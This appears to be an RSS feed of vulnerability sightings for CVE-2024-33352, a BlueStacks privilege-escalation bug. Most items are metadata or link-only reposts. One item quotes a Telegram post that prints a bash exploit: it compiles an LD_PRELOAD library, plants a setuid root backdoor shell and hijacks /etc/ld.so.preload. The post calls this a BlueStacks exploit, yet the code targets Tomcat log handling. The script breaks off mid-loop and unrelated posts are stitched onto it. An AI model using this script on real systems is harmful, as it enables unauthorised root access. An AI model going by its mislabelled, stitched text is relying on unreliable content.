<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the 10 most recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 09 May 2026 22:15:48 +0000</lastBuildDate>
    <item>
      <!-- Sighting record. description and content:encoded carry the same JSON
           object as escaped text. Here "content" is empty and "source" is an
           opaque Telegram-prefixed token, so the entry only records that
           CVE-2024-33352 was tagged "published-proof-of-concept"; it carries no
           evidence that can be checked from the feed itself.
           Consumers should parse the JSON as data and not render it as markup. -->
      <title>3130dfa1-0031-4157-b83f-7bcc8d950305</title>
      <link>https://vulnerability.circl.lu/sighting/3130dfa1-0031-4157-b83f-7bcc8d950305/export</link>
      <description>{"uuid": "3130dfa1-0031-4157-b83f-7bcc8d950305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "Telegram/SEnCVJxhjOaVAWrOQ1TsM3Vg9broAvFC9FsVM7ZHaSoej6U", "content": "", "creation_timestamp": "2024-08-09T00:41:34.000000Z"}</description>
      <content:encoded>{"uuid": "3130dfa1-0031-4157-b83f-7bcc8d950305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "Telegram/SEnCVJxhjOaVAWrOQ1TsM3Vg9broAvFC9FsVM7ZHaSoej6U", "content": "", "creation_timestamp": "2024-08-09T00:41:34.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/3130dfa1-0031-4157-b83f-7bcc8d950305/export</guid>
      <pubDate>Fri, 09 Aug 2024 00:41:34 +0000</pubDate>
    </item>
    <item>
      <!-- Sighting record whose "content" is text copied from the Telegram post
           named in "source", including a link to an external repository.
           NOTE(review): nothing in this record shows that the linked repository
           or the claim in the post was verified. Treat the URL as untrusted
           third-party input: do not fetch it automatically, and triage it as an
           unconfirmed report for CVE-2024-33352. -->
      <title>b650eea5-40c5-48c2-9304-90ffd869cfd2</title>
      <link>https://vulnerability.circl.lu/sighting/b650eea5-40c5-48c2-9304-90ffd869cfd2/export</link>
      <description>{"uuid": "b650eea5-40c5-48c2-9304-90ffd869cfd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/androidMalware/2297", "content": "BlueStacks (Android emulator) privilege escalation through VM backdooring (CVE-2024-33352)\nhttps://github.com/mmiszczyk/CVE-2024-33352", "creation_timestamp": "2024-08-16T08:21:03.000000Z"}</description>
      <content:encoded>{"uuid": "b650eea5-40c5-48c2-9304-90ffd869cfd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/androidMalware/2297", "content": "BlueStacks (Android emulator) privilege escalation through VM backdooring (CVE-2024-33352)\nhttps://github.com/mmiszczyk/CVE-2024-33352", "creation_timestamp": "2024-08-16T08:21:03.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/b650eea5-40c5-48c2-9304-90ffd869cfd2/export</guid>
      <pubDate>Fri, 16 Aug 2024 08:21:03 +0000</pubDate>
    </item>
    <item>
      <!-- Sighting record with two caveats for consumers.
           1. The post text is double-escaped: "&amp;gt;" decodes under XML to
              the text "&gt;", not to ">". This suggests the content was already
              HTML-escaped before serialization (inferred, not shown by the
              feed). Decode exactly once per layer and keep the result as text;
              never un-escape repeatedly and then render it.
           2. The quoted post discusses two CVE ids, but the "vulnerability"
              field ties the record only to CVE-2024-33352. Key on that field,
              not on ids matched inside "content". -->
      <title>00cb85db-d411-4991-958d-79a07a2f6454</title>
      <link>https://vulnerability.circl.lu/sighting/00cb85db-d411-4991-958d-79a07a2f6454/export</link>
      <description>{"uuid": "00cb85db-d411-4991-958d-79a07a2f6454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3484", "content": "#exploit\n1. CVE-2024-34329:\nPrivilege escalation on Windows through a card printer software\nhttps://p0pcycle.com/2024/07/21/i-hacked-a-card-printer-software\n]-&amp;gt; https://github.com/pamoutaf/CVE-2024-34329\n\n2. CVE-2024-33352:\nBlueStacks privilege escalation through VM backdooring\nhttps://github.com/mmiszczyk/CVE-2024-33352", "creation_timestamp": "2024-08-16T11:18:01.000000Z"}</description>
      <content:encoded>{"uuid": "00cb85db-d411-4991-958d-79a07a2f6454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3484", "content": "#exploit\n1. CVE-2024-34329:\nPrivilege escalation on Windows through a card printer software\nhttps://p0pcycle.com/2024/07/21/i-hacked-a-card-printer-software\n]-&amp;gt; https://github.com/pamoutaf/CVE-2024-34329\n\n2. CVE-2024-33352:\nBlueStacks privilege escalation through VM backdooring\nhttps://github.com/mmiszczyk/CVE-2024-33352", "creation_timestamp": "2024-08-16T11:18:01.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/00cb85db-d411-4991-958d-79a07a2f6454/export</guid>
      <pubDate>Fri, 16 Aug 2024 11:18:01 +0000</pubDate>
    </item>
    <item>
      <!-- Content-less sighting: "content" is empty and "source" is an opaque
           Telegram-prefixed token rather than a resolvable URL, so the record
           asserts the "published-proof-of-concept" type for CVE-2024-33352
           without any text to review. pubDate repeats the JSON
           "creation_timestamp" in RFC 822 form. -->
      <title>5a39e811-f89e-446b-a310-2af4c400c7ba</title>
      <link>https://vulnerability.circl.lu/sighting/5a39e811-f89e-446b-a310-2af4c400c7ba/export</link>
      <description>{"uuid": "5a39e811-f89e-446b-a310-2af4c400c7ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "Telegram/8YUzU5Wkwl-5fVrbtRBQ5wa0t-cfwpILGHkMAq4_N2xZa1c", "content": "", "creation_timestamp": "2024-11-26T11:20:19.000000Z"}</description>
      <content:encoded>{"uuid": "5a39e811-f89e-446b-a310-2af4c400c7ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "Telegram/8YUzU5Wkwl-5fVrbtRBQ5wa0t-cfwpILGHkMAq4_N2xZa1c", "content": "", "creation_timestamp": "2024-11-26T11:20:19.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/5a39e811-f89e-446b-a310-2af4c400c7ba/export</guid>
      <pubDate>Tue, 26 Nov 2024 11:20:19 +0000</pubDate>
    </item>
    <item>
      <title>38ae3309-c519-4649-abb4-0515d15de5ad</title>
      <link>https://vulnerability.circl.lu/sighting/38ae3309-c519-4649-abb4-0515d15de5ad/export</link>
      <description>{"uuid": "38ae3309-c519-4649-abb4-0515d15de5ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1611", "content": "\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 BlueStacks\u060c \u0648\u0647\u0648 \u0645\u062d\u0627\u0643\u064a \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0634\u0627\u0626\u0639 \u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u0627\u0644\u062d\u0648\u0627\u0633\u064a\u0628 \u0627\u0644\u0634\u062e\u0635\u064a\u0629. \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b mmiszczyk \u0648\u062a\u0645 \u0646\u0634\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0639\u0644\u0649 GitHub. 
\u062a\u062a\u0639\u0644\u0642 \u0627\u0644\u062b\u063a\u0631\u0629 \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0628\u0631 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a (VM) \u0627\u0644\u062e\u0627\u0635 \u0628\u0640 BlueStacks\u060c \u0645\u0645\u0627 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u062c\u0630\u0631 (root) \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629\n\n\u062a\u0639\u062a\u0645\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0639\u0644\u0649 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0645\u064a\u0632\u0627\u062a \u0645\u062d\u062f\u062f\u0629 \u0641\u064a BlueStacks \u0644\u0632\u0631\u0639 \u0628\u0631\u0627\u0645\u062c \u0636\u0627\u0631\u0629 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u060c \u0645\u0645\u0627 \u064a\u0624\u062f\u064a \u0625\u0644\u0649 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a. 
\u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n\n\u0644\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629\u060c \u064a\u062d\u062a\u0627\u062c \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0635 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644. \u062a\u0645 \u062a\u0648\u0641\u064a\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b\u060c \u0648\u0627\u0644\u0630\u064a \u064a\u0648\u0636\u062d \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0647\u062c\u0648\u0645.\n\n#### \u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0646\u0641\u064a\u0630\n\n1. \u062a\u0646\u0632\u064a\u0644 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0646\u0635: \u064a\u0645\u0643\u0646 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0646\u0635 \u0627\u0644\u062e\u0627\u0635 \u0628\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0645\u0646 [\u0647\u0646\u0627](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh).\n2. 
\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635: \u064a\u062c\u0628 \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0628\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0645\u0633\u062a\u062e\u062f\u0645 \u0639\u0627\u062f\u064a. \u0627\u0644\u0646\u0635 \u064a\u0642\u0648\u0645 \u0628\u0625\u0639\u062f\u0627\u062f \u0628\u064a\u0626\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0639\u0646 \u0637\u0631\u064a\u0642 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a.\n\n### \u0627\u0644\u0634\u0631\u062d \u0627\u0644\u0641\u0646\u064a \u0644\u0644\u0646\u0635\n\n#!/bin/bash\n# BlueStacks Privilege Escalation Exploit\n# CVE-2024-33352\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0636\u0631\u0648\u0631\u064a\u0629 \u0644\u0632\u0631\u0639 \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\nBACKDOORSH=\"/bin/bash\"\nBACKDOORPATH=\"/tmp/bluestacksrootsh\"\nPRIVESCLIB=\"/tmp/privesclib.so\"\nPRIVESCSRC=\"/tmp/privesclib.c\"\n\nfunction cleanexit {\n # \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u0639\u062f \u0627\u0644\u0627\u0646\u062a\u0647\u0627\u0621\n echo -e \"\\n[+] Cleaning up...\"\n rm -f $PRIVESCSRC\n rm -f $PRIVESCLIB\n rm -f $TOMCATLOG\n touch $TOMCATLOG\n if [ -f /etc/ld.so.preload ]; then\n echo -n &amp;gt; /etc/ld.so.preload 2&amp;gt;/dev/null\n fi\n echo -e \"\\n[+] Job done. 
Exiting with code $1 \\n\"\n exit $1\n}\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\ncat &amp;lt;&amp;lt;_solibeof_&amp;gt;$PRIVESCSRC\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \nuid_t geteuid(void) {\n static uid_t (*old_geteuid)();\n old_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\n if ( old_geteuid() == 0 ) {\n chown(\"$BACKDOORPATH\", 0, 0);\n chmod(\"$BACKDOORPATH\", 04777);\n unlink(\"/etc/ld.so.preload\");\n }\n return old_geteuid();\n}\n_solibeof_\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\n cleanexit 2;\nfi\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u062e\u0644\u0641\u064a\u0629/\u0627\u0644\u0642\u0634\u0631\u0629 \u0630\u0627\u062a \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u0645\u0646\u062e\u0641\u0636\u0629\ncp $BACKDOORSH $BACKDOORPATH\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\nls -l $BACKDOORPATH\"\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0631\u0627\u0628\u0637 \u0627\u0644\u0631\u0645\u0632\u064a \u0644\u0645\u0644\u0641 ld.so.preload\nrm -f $TOMCATLOG &amp;amp;&amp;amp; ln -s /etc/ld.so.preload $TOMCATLOG\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] 
Couldn't remove the $TOMCATLOG file or create a symlink.\"\n cleanexit 3\nfi\necho -e \"\\n[+] Symlink created at: \\nls -l $TOMCATLOG\"\n\n# \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 \u062d\u062a\u0649 \u064a\u062a\u0645 \u0625\u0639\u0627\u062f\u0629 \u0641\u062a\u062d \u0627\u0644\u0633\u062c\u0644\u0627\u062a \u0628\u0648\u0627\u0633\u0637\u0629 Tomcat\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\nwhile :; do\n sleep 0.1\n if [ -f /etc/ld.so.preload ]; then\n echo $PRIVESCLIB &amp;gt; /etc/ld.so.preload\n break;\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629\n\n\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0646\u0638\u0627\u0645 \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\u060c \u064a\u064f\u0646\u0635\u062d \u0628\u062a\u062d\u062f\u064a\u062b BlueStacks \u0625\u0644\u0649 \u0622\u062e\u0631 \u0625\u0635\u062f\u0627\u0631 \u0648\u0627\u0644\u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u0637\u0628\u064a\u0642 \u062c\u0645\u064a\u0639 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u062a\u0627\u062d\u0629. 
\u0643\u0645\u0627 \u064a\u062c\u0628 \u062f\u0627\u0626\u0645\u064b\u0627 \u0627\u0644\u062d\u0631\u0635 \u0639\u0644\u0649 \u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0644\u0646\u0634\u0627\u0637\u0627\u062a \u063a\u064a\u0631 \u0627\u0644\u0627\u0639\u062a\u064a\u0627\u062f\u064a\u0629.\n\n### \u0627\u0644\u0645\u0635\u0627\u062f\u0631\n\n- [mmiszczyk/CVE-2024-33352 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352)\n- [\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh)\n\nALSED404:\n\u0627\u062d\u0630\u0631 \u0645\u0646 \u062d\u0632\u0645\u0629 PyPI \"lr-utils-lib\"\u060c \u0641\u0647\u064a \u062a\u0645\u062b\u0644 \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u062c\u062f\u064a\u062f\u064b\u0627 \u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a macOS!\n\n\u062a\u0633\u0631\u0642 \u0647\u0630\u0647 \u0627\u0644\u062d\u0632\u0645\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f Google Cloud\u060c \u0645\u0645\u0627 \u064a\u0634\u0643\u0644 \u062e\u0637\u0631\u064b\u0627 \u0643\u0628\u064a\u0631\u064b\u0627 \u0639\u0644\u0649 \u0643\u0644 \u0645\u0646 \u0627\u0644\u0645\u0637\u0648\u0631\u064a\u0646 \u0627\u0644\u0623\u0641\u0631\u0627\u062f \u0648\u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a.\n\n\u0627\u0642\u0631\u0623 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2024/07/malicious-pypi-package-targets-macos-to.html\n\nSQL\ud83d\udc7d:\n\u0625\u0644\u064a\u0643 \u0628\u0639\u0636 \u0627\u0644\u0643\u0648\u0631\u0633\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0648\u0625\u0635\u0644\u0627\u062d\u0647\u0627\u060c 
\u0645\u0639 \u0628\u0639\u0636 \u0627\u0644\u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u0645\u0647\u0645\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062c\u0627\u0644:\n\n### \u062f\u0648\u0631\u0627\u062a \u0628\u0627\u0644\u0644\u063a\u0629 \u0627\u0644\u0639\u0631\u0628\u064a\u0629:\n\n1. \u062f\u0648\u0631\u0629 \u0627\u0644\u0642\u0631\u0635\u0646\u0629 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a\u0629 \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629:\n   - \u0645\u0646\u0635\u0629: \u0623\u0643\u0627\u062f\u064a\u0645\u064a\u0629 \u0627\u0644\u0632\u064a\u0631\u0648\n   - \u062a\u063a\u0637\u064a \u0627\u0644\u062f\u0648\u0631\u0629 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0623\u0645\u0627\u0646 \u0641\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.elzero.org/courses/ethical-hacking/)", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}</description>
      <content:encoded>{"uuid": "38ae3309-c519-4649-abb4-0515d15de5ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1611", "content": "\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 BlueStacks\u060c \u0648\u0647\u0648 \u0645\u062d\u0627\u0643\u064a \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0634\u0627\u0626\u0639 \u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u0627\u0644\u062d\u0648\u0627\u0633\u064a\u0628 \u0627\u0644\u0634\u062e\u0635\u064a\u0629. \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b mmiszczyk \u0648\u062a\u0645 \u0646\u0634\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0639\u0644\u0649 GitHub. 
\u062a\u062a\u0639\u0644\u0642 \u0627\u0644\u062b\u063a\u0631\u0629 \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0628\u0631 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a (VM) \u0627\u0644\u062e\u0627\u0635 \u0628\u0640 BlueStacks\u060c \u0645\u0645\u0627 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u062c\u0630\u0631 (root) \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629\n\n\u062a\u0639\u062a\u0645\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0639\u0644\u0649 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0645\u064a\u0632\u0627\u062a \u0645\u062d\u062f\u062f\u0629 \u0641\u064a BlueStacks \u0644\u0632\u0631\u0639 \u0628\u0631\u0627\u0645\u062c \u0636\u0627\u0631\u0629 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u060c \u0645\u0645\u0627 \u064a\u0624\u062f\u064a \u0625\u0644\u0649 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a. 
\u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n\n\u0644\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629\u060c \u064a\u062d\u062a\u0627\u062c \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0635 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644. \u062a\u0645 \u062a\u0648\u0641\u064a\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b\u060c \u0648\u0627\u0644\u0630\u064a \u064a\u0648\u0636\u062d \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0647\u062c\u0648\u0645.\n\n#### \u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0646\u0641\u064a\u0630\n\n1. \u062a\u0646\u0632\u064a\u0644 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0646\u0635: \u064a\u0645\u0643\u0646 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0646\u0635 \u0627\u0644\u062e\u0627\u0635 \u0628\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0645\u0646 [\u0647\u0646\u0627](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh).\n2. 
